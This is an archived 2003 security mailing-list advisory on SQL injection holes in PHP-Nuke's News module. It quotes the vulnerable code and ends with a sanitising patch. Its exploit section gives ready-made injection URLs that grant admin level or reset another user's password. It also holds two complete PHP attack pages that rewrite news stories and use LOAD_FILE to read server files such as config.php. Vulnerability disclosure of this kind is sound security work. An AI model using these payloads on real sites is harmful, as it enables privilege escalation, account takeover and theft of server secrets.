[VulnWatch] PHP-Nuke, 'News' module : Big Security Holes

From: Frog Man (leseulfrog@hotmail.com)
Date: 03/22/03

  • Next message: Vladimir Katalov: "[VulnWatch] Vulnerability (critical): Digital signature for Adobe Acrobat/Reader plug-in can be forged"
    From: "Frog Man" <leseulfrog@hotmail.com>
    To: bugtraq@securityfocus.com
    Date: Sat, 22 Mar 2003 15:13:04 +0100
    
    

    Informations :
    같같같같같같같
    Versions : 5.6, 6.0, 6.5 RC1, 6.5 RC2, 6.5 RC3, 6.5
    Module : News
    Website : http://www.phpnuke.org
    Problem : SQL Injection
    Post Scriptum : No War For Oil !!

    PHP Code/Location :
    같같같같같같같같같
    /modules/News/article.php :

    ------------------------------------------------------------------------

    if (stristr($REQUEST_URI,"mainfile")) {
        Header("Location: modules.php?name=$module_name&file=article&sid=$sid");
    } elseif (!isset($sid) && !isset($tid)) {
        Header("Location: index.php");
    }

    if ($save AND is_user($user)) {
        cookiedecode($user);
        $db->sql_query("UPDATE ".$user_prefix."_users SET umode='$mode',
    uorder='$order', thold='$thold' where uid='$cookie[0]'");
        getusrinfo($user);
        $info =
    base64_encode("$userinfo[user_id]:$userinfo[username]:$userinfo[user_password]:$userinfo[storynum]:$userinfo[umode]:$userinfo[uorder]:$userinfo[thold]:$userinfo[noscore]");
        setcookie("user","$info",time()+$cookieusrtime);
    }
    ------------------------------------------------------------------------

    /modules/News/index.php :

    ------------------------------------------------------------------------
    [...]
    function rate_article($sid, $score) {
        global $prefix, $dbi, $ratecookie, $sitename, $r_options;
        if ($score) {
            if ($score > 5) { $score = 5; }
            if ($score < 1) { $score = 1; }
            if (isset($ratecookie)) {
                $rcookie = base64_decode($ratecookie);
                $r_cookie = explode(":", $rcookie);
            }
            for ($i=0; $i < sizeof($r_cookie); $i++) {
                if ($r_cookie[$i] == $sid) {
                    $a = 1;
                }
            }
            if ($a == 1) {
                Header("Location:
    modules.php?name=News&op=rate_complete&sid=$sid&rated=1");
            } else {
                $result = sql_query("update ".$prefix."_stories set score=score+$score,
    ratings=ratings+1 where sid='$sid'", $dbi);
                $info = base64_encode("$rcookie$sid:");
                setcookie("ratecookie","$info",time()+3600);
                Header("Location:
    modules.php?name=News&op=rate_complete&sid=$sid$r_options");
            }
        } else {
            include("header.php");
            title("$sitename: "._ARTICLERATING."");
            OpenTable();
            echo "<center>"._DIDNTRATE."<br><br>"
                .""._GOBACK."</center>";
            CloseTable();
            include("footer.php");
        }
    }

    [...]

    switch ($op) {

    [...]
        case "rate_article":
        rate_article($sid, $score);
        break;
    [...]

    }

    ?>
    ------------------------------------------------------------------------

    mainfile.php :
    ------------------------------------------------------------------
    [...]
    foreach ($_GET as $secvalue) {
        if ((eregi("<[^>]*script*\"?[^>]*>", $secvalue)) ||
            (eregi("<[^>]*object*\"?[^>]*>", $secvalue)) ||
            (eregi("\.\.", $secvalue)) ||
            (eregi("<[^>]*iframe*\"?[^>]*>", $secvalue)) ||
            (eregi("<[^>]*applet*\"?[^>]*>", $secvalue)) ||
            (eregi("<[^>]*meta*\"?[^>]*>", $secvalue)) ||
            (eregi("<[^>]*style*\"?[^>]*>", $secvalue)) ||
            (eregi("<[^>]*form*\"?[^>]*>", $secvalue)) ||
            (eregi("<[^>]*img*\"?[^>]*>", $secvalue)) ||
            (eregi("\([^>]*\"?[^)]*\)", $secvalue)) ||
            (eregi("\"", $secvalue))) {
            Header("Location: index.php");
            die();
        }
    }

    foreach ($_POST as $secvalue) {
        if (eregi("<[^>]*script*\"?[^>]*>", $secvalue)) {
            Header("Location: index.php");
            die();
        }
    }
    [...]
    ------------------------------------------------------------------

    Exploits :
    같같같같같
    if magic_quotes_gpc=OFF :

    - Change our level (into admin) :
    http://[target]/modules.php?name=News&file=article&sid=1&save=1&mode=',user_level='4
    or
    http://[target]/modules.php?name=News&file=article&sid=1&save=1&order=',user_level='4
    or
    http://[target]/modules.php?name=News&file=article&sid=1&save=1&thold=',user_level='4

    - Change the Bob's password :
    http://[target]/modules.php?name=News&file=article&sid=1&save=1&order=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*

    if magic_quotes_gpc=OFF AND ON !!

    Change the title, article,... of a news :

    ------------------------------------------------------------------------
    <html>
    <head>
    <title>PHP-Nuke Change News</title>
    </head>
    <body>
    <?
    function ascii_phpnuke_exploit($str) {
    for ($i=0;$i < strlen($str);$i++) {
    if ($i == strlen($str)-1){
    $ascii_char.=ord(substr($str,$i));
    }else{
    $ascii_char.=ord(substr($str,$i)).',';
    }
    }
    return $ascii_char;
    }

    if (isset($submit)) {

    $score="1";
    if (isset($title)) {
    $score.=", title=char(".ascii_phpnuke_exploit($title).")";
    }
    if (strlen($hometext)>1) {
    $score.=", hometext=char(".ascii_phpnuke_exploit($hometext).")";
    }
    if (strlen($bodytext)>1){
    $score.=", bodytext=char(".ascii_phpnuke_exploit($bodytext).")";
    }
    ?>

    <b>Target URL : </b><? echo $target; ?><br><br>
    <b>SID : </b><? echo $sid; ?><br><br>
    <b>New Title : </b><? echo $title; ?><br><br>
    <b>New Story Text : </b><? echo $hometext; ?><br><br>
    <b>New Extended Text : </b><? echo $bodytext; ?><br><br>

    <form method="POST" action="<? echo $target; ?>/modules.php">
    <input type="hidden" name="name" value="News">
    <input type="hidden" name="op" value="rate_article">
    <input type="hidden" name="sid" value="<? echo $sid; ?>">
    <input type="hidden" name="score" value="<? echo $score; ?>">
    <input type="submit" name="submit" value="Change the News">
    </form>
    <input type="submit" value="Back" onclick="history.go(-1)">

    <?
    }else{
    ?>

    <form method="GET" action="<? echo $PHP_SELF; ?>">
    Target URL : <input type="text" name="target"><br>
    News SID : <input type="text" name="sid"><br><br>
    <b>New Title :</b><br> <input type="text" name="title"><br>
    <br><br><b>New Story Text :</b><br><textarea cols="50" rows="12"
    name="hometext"></textarea>
    <br><br><br><b>New Extended Text : </b><br><textarea cols="50" rows="12"
    name="bodytext"></textarea><br><br>
    <input type="submit" name="submit" value="Preview">
    </form>

    <?
    }
    ?>

    </body>
    </html>
    ------------------------------------------------------------------------

    Save a file from the HD, like 'config.php' into a news :

    ------------------------------------------------------------------------
    <html>
    <head>
    <title>PHP-Nuke View File</title>
    </head>
    <body>
    <?
    function ascii_phpnuke_exploit($str) {
    for ($i=0;$i < strlen($str);$i++) {
    if ($i == strlen($str)-1){
    $ascii_char.=ord(substr($str,$i));
    }else{
    $ascii_char.=ord(substr($str,$i)).',';
    }
    }
    return $ascii_char;
    }

    if (isset($submit)) {

    $score="1";

    if (isset($hometext)) {
    $score.=", hometext=LOADFILE(char(".ascii_phpnuke_exploit($hometext)."))";
    }
    if (isset($bodytext)){
    $score.=", bodytext=LOADFILE(char(".ascii_phpnuke_exploit($bodytext)."))";
    }
    ?>

    <b>Target URL : </b><? echo $target; ?><br><br>
    <b>SID : </b><? echo $sid; ?><br><br>
    <b>File In Story Text : </b><? echo $hometext; ?><br><br>
    <b>File In Extended Text : </b><? echo $bodytext; ?><br><br>

    <form method="POST" action="<? echo $target; ?>/modules.php">
    <input type="hidden" name="name" value="News">
    <input type="hidden" name="op" value="rate_article">
    <input type="hidden" name="sid" value="<? echo $sid; ?>">
    <input type="hidden" name="score" value="<? echo $score; ?>">
    <input type="submit" name="submit" value="Change the News">
    </form>
    <input type="submit" value="Back" onclick="history.go(-1)">

    <?
    }else{
    ?>

    <form method="GET" action="<? echo $PHP_SELF; ?>">
    Target URL : <input type="text" name="target"><br>
    News SID : <input type="text" name="sid"><br><br>
    <br><br><b>File In Story Text (Full Path) :</b><br><input name="hometext">
    <br><br><br><b>File In Extended Text (Full Path) : </b><br><input
    name="bodytext"><br><br>
    <input type="submit" name="submit" value="Preview">
    </form>

    <?
    }
    ?>

    </body>
    </html>
    ------------------------------------------------------------------------

    The complete file can be found, for example at :
    http://[target]/modules/News/comments.php

    Solution :
    같같같같같
    Into mainfile.php, replace :

    ------------------------------------------------------------------
    [...]
    foreach ($_GET as $secvalue) {
        if ((eregi("<[^>]*script*\"?[^>]*>", $secvalue)) ||
            (eregi("<[^>]*object*\"?[^>]*>", $secvalue)) ||
            (eregi("\.\.", $secvalue)) ||
            (eregi("<[^>]*iframe*\"?[^>]*>", $secvalue)) ||
            (eregi("<[^>]*applet*\"?[^>]*>", $secvalue)) ||
            (eregi("<[^>]*meta*\"?[^>]*>", $secvalue)) ||
            (eregi("<[^>]*style*\"?[^>]*>", $secvalue)) ||
            (eregi("<[^>]*form*\"?[^>]*>", $secvalue)) ||
            (eregi("<[^>]*img*\"?[^>]*>", $secvalue)) ||
            (eregi("\([^>]*\"?[^)]*\)", $secvalue)) ||
            (eregi("\"", $secvalue))) {
            Header("Location: index.php");
            die();
        }
    }

    foreach ($_POST as $secvalue) {
        if (eregi("<[^>]*script*\"?[^>]*>", $secvalue)) {
            Header("Location: index.php");
            die();
        }
    }
    [...]
    ------------------------------------------------------------------

    by :

    --------------------------------------------------------------------------------------------------------------
    foreach ($_REQUEST as $key=>$value) {

        if (get_magic_quotes_gpc()==0) {
            $value = addslashes($value); // This will reproduce the option
    magic_quotes_gpc=1
        }

        $value =
    str_replace(array(')','=','<','>','|'),array('&#41;','&#61;','&#60;','&#62;','&#124;'),$value);

        ${$key} = $value;
        $_REQUEST[$key] = $value;
        if (isset($_POST[$key])) { $_POST[$key] = $value; }
        if (isset($_COOKIE[$key])) { $_COOKIE[$key] = $value; }
        if (isset($_FILE[$key])) { $_FILE[$key] = $value; }
        if (isset($_GET[$key])) { $_GET[$key] = $value; }
        if (isset($HTTP_POST_VARS[$key])) { $HTTP_POST_VARS[$key] = $value; }
        if (isset($HTTP_COOKIE_VARS[$key])) { $HTTP_COOKIE_VARS[$key] = $value;
    }
        if (isset($HTTP_FILE_VARS[$key])) { $HTTP_FILE_VARS[$key] = $value; }
        if (isset($HTTP_GET_VARS[$key])) { $HTTP_GET_VARS[$key] = $value; }
    }
    --------------------------------------------------------------------------------------------------------------

    A patch can be found on http://www.phpsecure.info

    More Details in French :
    같같같같같같같같같같같같
    http://www.frog-man.org/tutos/PHP-Nuke-News.txt

    Credits :
    같같같같
    frog-m@n
    http://www.phpsecure.info

    _________________________________________________________________
    MSN Messenger : discutez en direct avec vos amis !
    http://messenger.fr.msn.be


  • Next message: Vladimir Katalov: "[VulnWatch] Vulnerability (critical): Digital signature for Adobe Acrobat/Reader plug-in can be forged"